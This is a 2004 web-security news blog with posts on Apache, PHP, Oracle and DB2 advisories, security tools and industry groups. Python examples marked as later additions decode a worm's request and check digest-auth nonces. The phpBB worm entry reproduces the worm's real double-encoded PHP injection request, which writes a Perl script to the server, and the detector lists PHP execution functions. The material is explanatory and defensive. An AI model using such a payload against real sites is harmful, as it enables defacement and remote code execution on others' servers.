12/28/2004 Secure programmer: Call components safely
David Wheeler has published a paper that's worth mentioning.
"Application programs typically make calls to other components, such as the underlying operating system, database systems, reusable libraries, Internet services (like DNS), Web services, and so on. This article explains how to prevent attackers from exploiting those calls to other components by discussing the use of only secure components, passing only valid data, making sure the data will be correctly interpreted, checking return values and exceptions, and protecting data as it flows between applications and components." - David Wheeler

12/21/2004 New PHP Worm exploiting sites
A new worm is exploiting and defacing websites running phpBB, using a recently discovered vulnerability.
The worm sends the following request (one access log entry, rejoined here onto a single line):
x.x.x.x - - [20/Dec/2004:08:41:35 -0800] "GET /viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252echr(32)),exit%252e%2527 HTTP/1.0" 200"
This worm uses Google to find vulnerable hosts, which is rather interesting. On a side note,
I wrote a paper roughly two years ago predicting more advanced methods by which a web application worm could spread,
which can be found . I'm surprised
it's taking this long...
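Decoding what that request actually does is a useful exercise for anyone writing a detection rule for it. The highlight value is URL-encoded twice (%2527 decodes to %27 and only then to a quote, so it survives the server's own decoding pass) and every string is assembled from chr() calls so that nothing readable appears in the log. The Python below is an added example, not part of the original post and not the worm's code: it takes the log's request path (rejoined onto one line and embedded as a constructed sample), decodes each query parameter twice, folds the chr() chains back into the literals they build, and flags parameters that were double-encoded or that contain PHP file or execution functions. The list of suspicious function names is my own choice for the example, not something the page defines.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample: the request path from the log entry above, rejoined onto one line.
SAMPLE_PATH = (
    "/viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872"
    "&highlight=%2527%252Efwrite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)"
    "%252echr(50)%252echr(111)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)"
    "%252echr(117)%252echr(115)%252echr(114)%252echr(47)%252echr(98)%252echr(105)"
    "%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252echr(114)%252echr(108)"
    "%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252echr(32)),exit%252e%2527"
)

# PHP functions whose presence in a decoded query parameter is worth an alert
# (my own short list for this example, not something the original post defines).
SUSPICIOUS_CALLS = ("fwrite(", "fopen(", "system(", "passthru(", "exec(", "eval(")

# One or more chr(N) calls joined by PHP's '.' concatenation operator.
CHR_CHAIN = re.compile(r"chr\(\d+\)(?:\s*\.\s*chr\(\d+\))*")


def fold_chr(php_fragment):
    """Replace every chr(N).chr(M)... chain with the string literal it builds."""
    def build(match):
        codes = re.findall(r"chr\((\d+)\)", match.group(0))
        return repr("".join(chr(int(c)) for c in codes))
    return CHR_CHAIN.sub(build, php_fragment)


def analyze_request(path):
    """Return one finding per query parameter that looks hostile."""
    findings = []
    # parse_qs already performs the first round of percent-decoding
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    for name, values in params.items():
        for once in values:
            twice = unquote(once)          # second round: %2527 -> %27 -> '
            readable = fold_chr(twice)
            hits = [fn for fn in SUSPICIOUS_CALLS if fn in readable]
            if twice != once or hits:
                findings.append({
                    "param": name,
                    "double_encoded": twice != once,
                    "calls": hits,
                    "decoded": readable,
                })
    return findings


if __name__ == "__main__":
    for finding in analyze_request(SAMPLE_PATH):
        print(f"{finding['param']}: double_encoded={finding['double_encoded']} "
              f"calls={finding['calls']}")
        print("  " + finding["decoded"])
```

Run against the sample, only the highlight parameter is reported; its folded form shows the payload appending a Perl script to a file named m1ho2of, with the script body cut off in the log at "use " because the captured line ends there. A signature that only matches "fwrite" or "chr(" in the raw log would miss a variant that re-encodes or changes the function names, so the double-decoding itself is the more durable indicator.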

12/21/2004 Article on the recent ASP.NET Flaw
While reading I stumbled upon an interesting article
by Mark Burnett about the recent ASP.NET flaw.

12/05/2004 Web Application Security Consortium Guest Articles Call For Papers (CFP)
The Web Application Security Consortium is seeking guest writers to contribute web security
articles.
"Contributed articles may include industry best practices, technical information about current issues, innovative defense techniques, etc. NO VENDOR PITCHES OR MARKETING GIMMICKS PLEASE. We are only soliciting concrete information from the experts on the front lines of the web application security field." - WASC

11/21/2004 Server upgrades will result in downtime
This machine will be upgraded between November 22nd and 23rd so expect some
downtime. If after Wednesday you experience any issues please email
admin@cgisecurity.com with your concerns.
UPDATE: This machine has been upgraded. If you experience any
issues please email the address above.

10/29/2004 Apache 1.3.33 Released!
Apache 1.3.33 has been released to address an issue in Apache's SSI handler.

10/25/2004 Apache 1.3.32 Released!
Apache 1.3.32 has been released to address a security issue in .

10/25/2004 New MySQL Security Section
I finally got around to creating a MySQL Security section for this website. I am still
looking for additional content for this section so please

10/12/2004 Microsoft releases a *bunch* of security advisories
Microsoft has released 10 security patches fixing major issues. T-minus 60 days for the next big Internet worm!

10/9/2004 SANS Released Top 20 List
" The SANS Top 20 Internet Security Vulnerabilities
The vast majority of worms and other successful cyber attacks are made possible by vulnerabilities in a small number of common operating system services. Attackers are opportunistic. They take the easiest and most convenient route and exploit the best-known flaws with the most effective and widely available attack tools. They count on organizations not fixing the problems, and they often attack indiscriminately, scanning the Internet for any vulnerable systems. The easy and destructive spread of worms, such as Blaster, Slammer, and Code Red, can be traced directly to exploitation of unpatched vulnerabilities.
Four years ago, the SANS Institute and the National Infrastructure Protection Center (NIPC) at the FBI released a document summarizing the Ten Most Critical Internet Security Vulnerabilities. Thousands of organizations used that list, and the expanded Top-20 lists that followed one, two, and three years later, to prioritize their efforts so they could close the most dangerous holes first. The vulnerable services that led to worms like Blaster, Slammer, and Code Red, as well as NIMDA worms - are on that list.
This SANS Top-20 2004 is actually two Top Ten lists: the ten most commonly exploited vulnerable services in Windows and the ten most commonly exploited vulnerable services in UNIX and Linux. Although there are thousands of security incidents each year affecting these operating systems, the overwhelming majority of successful attacks target one or more of these twenty vulnerable services.
The Top-20 is a consensus list of vulnerabilities that require immediate remediation. It is the result of a process that brought together dozens of leading security experts. They come from the most security-conscious government agencies in the UK, US, and Singapore; the leading security software vendors and consulting firms; the top university-based security programs; many other user organizations; and the SANS Institute." - SANS

09/15/2004 Apache 2.0.51 released to address multiple security issues
"The Apache Software Foundation and the Apache HTTP Server Project
are pleased to announce the release of version 2.0.51 of the Apache
HTTP Server ("Apache"). This Announcement notes the significant
changes in 2.0.51 as compared to 2.0.50.
This version of Apache is principally a bug fix release. Of
particular note is that 2.0.51 addresses five security
vulnerabilities:"
" An input validation issue in IPv6 literal address parsing which
can result in a negative length parameter being passed to memcpy.
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0786]
A buffer overflow in configuration file parsing could allow a
local user to gain the privileges of a httpd child if the server
can be forced to parse a carefully crafted .htaccess file.
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0747]
A segfault in mod_ssl which can be triggered by a malicious
remote server, if proxying to SSL servers has been configured.
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0751]
A potential infinite loop in mod_ssl which could be triggered
given particular timing of a connection abort.
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0748]
A segfault in mod_dav_fs which can be remotely triggered by an
indirect lock refresh request.
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0809]" - Apache

09/01/2004 Even more Oracle Vulnerabilities!
Appsecinc has discovered 44 buffer overflows in Oracle.
"Multiple buffer overflow and denial of service (DoS) vulnerabilities
exist in the Oracle Database Server which allow database users to take
complete control over the database and optionally cause denial of service.
The official advisory from Oracle Corporation can be obtained from:
" - Appsecinc

09/01/2004 Vulnerabilities discovered in IBM's DB2 Universal Database
"Researchers at have discovered multiple critical/high risk
vulnerabilities in IBM's DB2 Universal Database. Versions affected include
DB2 8.1 Fixpak 6 and earlier
DB2 7.x Fixpak 11 and earlier
Two of the issues, remotely exploitable buffer overflows, have been fixed in
Fixpak 7 for DB2 8.1 and Fixpak 12 for DB2 7.x. These Fixpaks were released
last week and they can be downloaded from
" - ngsec

09/01/2004 Multiple Oracle Vulnerabilities discovered
"Researchers at have discovered multiple critical vulnerabilities
in Oracle Database Server and Oracle Application Server. Versions affected
include
Oracle Database 10g Release 1 Version 10.1.0.2
Oracle9i Database Server Release 2, versions 9.2.0.4 and 9.2.0.5
Oracle9i Database Server Release 1, versions 9.0.1.4, 9.0.1.5 and 9.0.4
Oracle8i Database Server Release 3, version 8.1.7.4
Oracle Application Server 10g (9.0.4), versions 9.0.4.0 and 9.0.4.1
Oracle9i Application Server Release 2, versions 9.0.2.3 and 9.0.3.1
Oracle9i Application Server Release 1, version 1.0.2.2" - ngsec

09/01/2004 Book Review: Hardening Apache
I was reading Slashdot today and came across a review of Hardening Apache.
"Hardening Apache fills a huge gap in this sense, providing web administrators with a
complete and yet concise book aimed to guide them from the very beginning of the installation
process to the final steps of the server configuration. The author, Tony Mobily, is also the mind
behind Professional Apache Security, a book published by Wrox Press which I reviewed on Slashdot
about 17 months ago. Since Wrox's unfortunate closure, some of the material from that book has been
moved into Hardening Apache."

08/30/2004 Website Updates
I've added a bunch of papers; be sure to check them out!

08/29/2004 Paros v3.1.3 Released
"Paros is a man-in-the-middle proxy and application vulnerability scanner. It allows users
to intercept, modify and debug HTTP and HTTPS data on-the-fly between web server and client
browser. It also supports client-certificate, proxy-chaining, filtering and various vulnerability
scanning." - Paros
[New features]
"
- Allow to run the scanner on a particular request shown in the lower URL list (select the request on the URL list, right-click and choose 'Scan Selected Node/Item')
- Allow to re-send a particular request shown in the lower URL list (select the request on the URL list, right-click and choose 'Re-send'). Check the correctness of the information such as the port before sending it out.
- Allow to craft a request by clicking the menu "Tools" => "Send HTTP(S) Requests"
- In the filter DetectUnsafeContent, add new IE vulnerability check, and improve ms-its checks and speed of other checks ."

07/27/04 Web Application Security Consortium (WASC) releases 'Threat Classifications' document
WASC has released a web security 'Threat Classifications'
document that attempts to help clarify some of the terms used in web security (such as XSS, session fixation, insufficient authorization, etc.).
Additional information can be found at the link below.

07/13/04 PHP 4.3.8 released to address security issues
PHP 4.3.8 and 5.0.0RC3 were released today to address a security
issue. Users running older versions are urged to upgrade (bla bla bla).

07/13/04 IIS 4.0 Buffer overflow discovered and other microsoft patches
Microsoft has released a batch of patches today. One of
the vulnerabilities disclosed was a buffer overflow in IIS 4.0.

06/30/04 Apache 2.0.50 Released to address security issues
"This version of Apache is principally a bug fix release. A summary of
the bug fixes is given at the end of this document. Of particular
note is that 2.0.50 addresses two security vulnerabilities:
A remotely triggered memory leak in http header parsing can allow a
denial of service attack due to excessive memory consumption.
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0493]
Fixes a mod_ssl buffer overflow in the FakeBasicAuth code for a
(trusted) client certificate subject DN which exceeds 6K in length.
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0488]" - apache.org

06/29/04 "Secure Apache 2 : Step by step"
I found this interesting article on securityfocus about securing apache 2. Definitely worth the read if you're
considering switching from the 1.3 branch.

06/15/04 Mod_security v1.8 released
"Mod_security is an Apache module whose purpose is to protect
vulnerable applications and reject human or automated attacks.
It is an open source intrusion detection and prevention system
for Apache. In addition to request filtering, it also creates Web
application audit logs. Requests are filtered using regular
expressions. Some of the things possible are:
* Apply filters against any part of the request (URI,
headers, either GET or POST)
* Apply filters against individual parameters
* Reject SQL injection attacks
* Reject Cross site scripting attacks
With few general rules mod_security can protect from both
known and unknown vulnerabilities." - mod_security
Download:

05/19/2004 Blind XPath XML injection paper released
"This paper describes a Blind XPath Injection attack that enables an
attacker to extract a complete XML document used for XPath querying -
without prior knowledge of the XPath query. The attack is "complete"
since all possible data is exposed. The attack makes use of two
techniques XPath crawling, and Booleanization of XPath queries.
Using this attack, it is possible to get hold of the XML "database"
used in the XPath query. This can be most powerful against sites that
use XPath queries (and XML "databases") for authentication,
searching, and other uses.
Compared to the SQL injection attacks, XPath Injection has the
following upsides:
(*) Since XPath is a standard (yet rich) language, it is possible to
carry the attack 'as-is' for any XPath implementation. This is in
contrast to SQL injection where different implementations have
different SQL dialects (there is a common SQL language, but it is
often too weak).
(*) The XPath language can reference practically all parts of the XML
document without access control restrictions, whereas with SQL, a
"user" (which is a term undefined in the XPath/XML context) may be
restricted to certain tables, columns or queries. So the outcome of
the Blind XPath Injection attack is guaranteed to consist of the
complete XML document, i.e. the complete database.
These results enable an automated attack to fit any XPath based
application provided that it possesses the basic security hole.
Indeed, such a proof of concept script was written and demonstrated
on various XPath implementations." - Sanctum

05/11/2004 Apache 1.3.31 Released!
The Apache project has released 1.3.31, primarily to fix 4 security issues.
"Apache 1.3.31 Major changes
Security vulnerabilities
* CAN-2003-0987 (cve.mitre.org)
In mod_digest, verify whether the nonce returned in the client
response is one we issued ourselves. This problem does not affect
mod_auth_digest.
* CAN-2003-0020 (cve.mitre.org)
Escape arbitrary data before writing into the errorlog.
* CAN-2004-0174 (cve.mitre.org)
Fix starvation issue on listening sockets where a short-lived
connection on a rarely-accessed listening socket will cause a
child to hold the accept mutex and block out new connections until
another connection arrives on that rarely-accessed listening socket.
* CAN-2003-0993 (cve.mitre.org)
Fix parsing of Allow/Deny rules using IP addresses without a
netmask; issue is only known to affect big-endian 64-bit
platforms" - apache
The
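The mod_digest item above is a compact statement of what a server-side nonce check has to do: a nonce the server handed out in its challenge must be recognisable as the server's own when it comes back in the client's response, and the server should not have to keep a table of every nonce it ever issued to decide that. The Python below is an added example of such a check, not Apache's code: it issues nonces as a timestamp bound to a server secret with an HMAC, and accepts a returned nonce only if the tag verifies under that secret and the timestamp is within a freshness window. The secret, the 300-second window and the "time:tag" layout are assumptions made for the example.

```python
import hashlib
import hmac
import os
import time

# Per-server secret; an assumption for this example (a real server would persist
# or derive it so that every worker process agrees on it).
SERVER_SECRET = os.urandom(32)
NONCE_LIFETIME = 300  # seconds a nonce stays acceptable; chosen for the example


def _tag(secret, issued_at):
    # HMAC over the issue time: only a holder of the secret can produce a valid tag,
    # so a client cannot mint its own nonce or alter the timestamp of one it received.
    return hmac.new(secret, str(issued_at).encode(), hashlib.sha256).hexdigest()[:32]


def issue_nonce(secret=SERVER_SECRET, now=None):
    """Build a nonce of the form '<unix time>:<hmac tag>' for a 401 challenge."""
    issued_at = int(time.time() if now is None else now)
    return f"{issued_at}:{_tag(secret, issued_at)}"


def verify_nonce(nonce, secret=SERVER_SECRET, now=None, lifetime=NONCE_LIFETIME):
    """Accept only nonces this server issued, and only while they are fresh."""
    try:
        issued_str, tag = nonce.split(":", 1)
        issued_at = int(issued_str)
    except ValueError:
        return False                                  # malformed: not ours
    expected = _tag(secret, issued_at)
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return False                                  # forged, or another server's
    current = int(time.time() if now is None else now)
    return 0 <= current - issued_at <= lifetime       # reject future and stale nonces


if __name__ == "__main__":
    challenge = issue_nonce()
    print("issued:", challenge)
    print("genuine nonce accepted:", verify_nonce(challenge))
    print("client-chosen nonce accepted:", verify_nonce("12345:0000"))
```

The freshness window is what bounds replay: without it a captured nonce would verify forever, and a server that wants single-use nonces still needs a short-lived record of those it has already seen within the window.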

05/11/2004 Tools on portswigger.net
I recently came across portswigger.net, which has a great collection
of free tools (written in Java) for use during web application security auditing. Below are some highlights:
* Burp Spider
"Burp spider is a tool for enumerating web-enabled applications. It uses various intelligent techniques to generate a comprehensive inventory of an application's content and functionality.
Burp spider enables the user to obtain a detailed understanding of how a web application works, avoiding the time-consuming and unreliable task of manually following links, submitting forms and scouring HTML source code. Potentially vulnerable application functions can be quickly identified, allowing the user to check for specific vulnerabilities such as SQL injection and directory traversal." - portswigger.net
* Burp proxy
"Burp proxy is an interactive HTTP/S proxy server for attacking and debugging web-enabled applications. It operates as a man-in-the-middle between the end browser and the target web server, and allows the user to intercept, inspect and modify the raw traffic passing in both directions.
Burp proxy allows an attacker to find and exploit application vulnerabilities by monitoring and manipulating critical parameters and other data transmitted by the application. By modifying browser requests in various malicious ways, burp proxy can be used to perform attacks such as SQL injection, cookie subversion, privilege escalation, session hijacking, directory traversal and buffer overflows." - portswigger.net
* Burp Sock
"Sock is a simple tool for manually attacking web-enabled applications. It allows a single HTTP request to be manipulated and re-issued repeatedly from the same window. Each response can be viewed as plain text or rendered as a web page, and can be searched for keywords. Sock supports SSL, and keeps a history of all requests and responses.
Sock provides a convenient graphical context in which to execute the kind of manual application testing that can be performed from a command line using tools such as netcat and stunnel. In addition, sock automatically handles various encodings of server responses, including chunked transfer-encoding and compressed content-encoding." - portswigger

05/10/2004 Website Updates
The following sections of this website have been updated. Expect many more updates throughout the week.

05/10/2004 Site updates
You may be wondering why I haven't updated this site in awhile. Mostly because I've been busy with work/life/Other. One thing
I have been spending a lot of time on is the which will
be releasing which is a rather large document due out soon. This website will start to pick up a bit with
very regular updates. Stay tuned!

05/10/2004 Tomcat 5.0.24 Stable Released
Tomcat 5.0.24 Stable has been released.
That is all...

2/23/04 Web Application Security Consortium group formed
A new web security group called The Web Application Security Consortium announced itself today. This group
will release documents, and form projects to help address some of the issues in web security. The first release
by this group is the "Web Security Glossary", an index of all common terminology involving web application
security.
" The Web Security Glossary is an alphabetical index of terms and terminology relating to web applications security. The purpose of the Glossary is to further clarify the language used within the community." - WASC

2/22/04 Free Web Services Security Tool
I found a free tool by Vordel that is very useful for people who plan on auditing their web services
for security vulnerabilities called "Vordel SOAPbox" (Registration required).

2/20/04 New Approach to .NET obfuscation
I found an interesting article on slashdot talking about a new technology that will further lockdown
.NET applications. From this initial article this looks like a promising new technology.
"One area of research is called "Program State Code Protection,” or PSCP, which means changing the code AS IT RUNS to make it harder for a cracker to know what is actually happening. Dotfuscator and DashO, for example, right now change all variable names to the same name. But what if all variable names were changed not just to the same name, but were changed continuously to a wide variety of names? The first technique -– making all the variable names the same -– is like building a jigsaw puzzle entirely of white pieces. But PSCP is like making a jigsaw puzzle of all white pieces that spontaneously and continuously appear to change size and shape."

Information contained on this website may not be copied without explicit permission.